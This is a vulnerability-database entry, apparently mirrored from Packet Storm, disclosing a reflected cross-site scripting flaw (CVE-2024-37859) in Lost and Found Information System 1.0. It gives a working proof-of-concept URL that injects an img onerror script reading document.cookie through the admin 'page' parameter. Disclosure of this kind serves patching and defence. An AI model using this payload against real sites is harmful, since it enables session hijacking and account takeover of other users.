Lucene search

K
packetstormAmit RoyPACKETSTORM:179081
HistoryJun 13, 2024 - 12:00 a.m.

Lost And Found Information System 1.0 Cross Site Scripting

2024-06-1300:00:00
Amit Roy
packetstormsecurity.com
42
exploit
xss
cross site scripting
vulnerability
lost and found information system
reflected
javascript
cve-2024-37859
security

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

`# Exploit Title: Refelcted Cross Site Scripting Exploit - Lost and Found Information System   
# Exploit Author: Amit Roy (Rezur / AR0x7)  
# Date: June 07, 2024  
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip  
# Tested on: Kali Linux, Apache, Mysql  
# Version: v1.0  
# Exploit Description:  
# Lost and Found Information System v1.0 suffers from a Refelcted Cross Site Scripting Vulnerability allowing attackers to execute javascript in context of other users  
# CVE : CVE-2024-37859  
  
1) Visit the folowing url to trigger the XSS - http://target.com/admin/?page=<img src=x onerror=alert(document.cookie)>  
`

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%